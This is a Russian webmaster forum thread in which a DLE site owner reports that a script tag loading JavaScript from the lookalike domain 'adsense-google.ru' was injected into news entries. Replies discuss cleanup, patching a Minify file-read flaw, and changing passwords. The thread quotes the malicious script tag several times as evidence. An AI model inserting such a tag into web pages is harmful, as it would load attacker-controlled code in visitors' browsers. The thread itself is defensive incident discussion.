Вирус dle

konchik
На сайте с 08.11.2010
Offline
94
1679

Сегодня на многих моих DLE сайтах появился опасный код <script type="text/javascript" async="async" src="http://adsense-google.ru/js/8f14e45fceea167a5a36dedd4bea2543.js">

Прописывается эта дрянь в новостях. Т.е открываешь "редактировать новость - выбираешь новость, а там и в краткой и в полной новости код <script type="text/javascript" async="async" src="http://adsense-google.ru/js/8f14e45fceea167a5a36dedd4bea2543.js">

Как защитить движок, как удалить код со всех страниц?

[Удален]
#1
konchik:
Сегодня на многих моих DLE сайтах появился опасный код <script type="text/javascript" async="async" src="http://adsense-google.ru/js/8f14e45fceea167a5a36dedd4bea2543.js">

Прописывается эта дрянь в новостях. Т.е открываешь "редактировать новость - выбираешь новость, а там и в краткой и в полной новости код <script type="text/javascript" async="async" src="http://adsense-google.ru/js/8f14e45fceea167a5a36dedd4bea2543.js">


Как защитить движок, как удалить код со всех страниц?

Сайты на 1 хостинге? Если да то ответ очевиден - 1 что нужно сделать - сменить хостинг

konchik
На сайте с 08.11.2010
Offline
94
#2
CkuTep:
Сайты на 1 хостинге? Если да то ответ очевиден - 1 что нужно сделать - сменить хостинг

Да при чем здесь хостинг? На любом хостинге это можно подцепить, дело в движке. Нашел решение тут http://webmasters.ru/forum/f141/pomogite-udalit%60-virus-na-dle-chuzhoi-skript-v-novostyah-49206/ пойду пробовать

[Удален]
#3

Решение неверное. Вы удаляете кэш, а в базе записи остаются. Нужно удалить из базы записи и перестроить новости для очистки кэша.

maximka77
На сайте с 15.10.2011
Offline
245
#4

Удаляется этот код перестроением публикаций в админпанели, только если эта гадость попала на статические страницы - там только руками чистить. Проверено.

- Базы чатов и каналов Телеграм ( https://base-top.ru/ ) - Недорогие ссылки с форумов (https://cutt.ly/swQDFZWx)
R
На сайте с 24.01.2008
Offline
180
#5

ТС, после удаления вируса и установки патчей не забудьте сменить пароль от БД, если есть необходимость в помощи стучите.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
konchik
На сайте с 08.11.2010
Offline
94
#6

Так дело в том, что патч у меня уже стоял этот:

Проблема: Недостаточная фильтрация данных в модуле сжатия файлов Minify входящем в состав DLE (https://code.google.com/p/minify/), которая может позволить при определенных настройках серверного ПО читать содержимое файлов.

Ошибка в версии: 8.5 - 10.0

Степень опасности: Высокая

Для исправления откройте файл: /engine/classes/min/index.php и в самое начало файла после строчки:

<?php

добавьте

if (isset($_GET['f'])) {

$_GET['f'] = str_replace(chr(0), '', (string)$_GET['f']);

}

---------- Добавлено 15.10.2013 в 09:46 ----------

Вообщем поменял все пароли от баз данных, так же удалил все записи из баз <script type="text/javascript" async="async" src="http://adsense-google.ru/js/8f14e45fceea167a5a36dedd4bea2543.js"> при помощи софта из этого поста http://webmasters.ru/forum/f141/pomogite-udalit%60-virus-na-dle-chuzhoi-skript-v-novostyah-49206/index2.html#post522956

Также поменял все пароли к админке и фтп.

Странно, что у меня уже стоял этот патч http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий